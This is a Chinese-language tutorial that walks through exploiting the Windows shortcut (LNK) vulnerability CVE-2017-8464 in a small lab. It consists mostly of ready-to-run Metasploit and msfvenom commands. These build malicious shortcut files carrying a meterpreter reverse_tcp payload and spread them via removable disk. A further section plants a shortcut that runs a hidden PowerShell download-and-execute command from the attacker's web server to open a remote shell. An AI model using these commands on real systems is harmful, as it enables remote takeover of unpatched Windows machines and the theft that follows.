早在6月13日,微软发布补丁修复编号为CVE-2017-8464的漏洞,本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行,追溯到以前,NSA就承认利用过相似漏洞且以“Olympic Game”为代号研发震网病毒,来阻止伊朗发展核武。
受影响版本
Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016
实战Metasploit成功利用
环境:
kali Linux:192.168.149.129
win7 SP1 一台
下载利用工具:https://github.com/rapid7/metasploit-framework/archive/master.zip
下载完成后将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。
2.仅复制rb文件会出错,须再将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。
安装完后打开终端
msfconsole use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [你的IP地址] exploit
之后会在/root/.msf4/local目录下生成我们的利用文件
注意:kali2.0下无法直接访问该文件夹,可通过命令行将/root/.msf4/local/下的所有文件复制到/root/1下
cp -r /root/.msf4/local/ /root/1
全部复制到移动磁盘中去
然后在msf监听
use multi/handler set paylaod windows/meterpreter/reverse_tcp set LHOST [你的IP地址] run
然后在目标机上打开移动磁盘
成功接受到返回的shell
利用Powershell提权
首先还是利用msf生成一个ps1文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.149.129 -f psh-reflection>/opt/search.ps1
然后将/opt/目录下的search.ps1文件移动到/var/www/html/下
随后打开Apache服务
service apache2 start
访问web下的sp1文件
然后在目标机上建立一个快捷方式
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.149.129/search.ps1‘);test.ps1"
这里写我们构造好的代码
然后选中powershell.exe
再到本机上配置监听
运行ps1快捷文件
作者:神风
参考文章:
“震网三代”(CVE-2017-8464)的几种利用方法与防范:http://www.freebuf.com/news/143356.html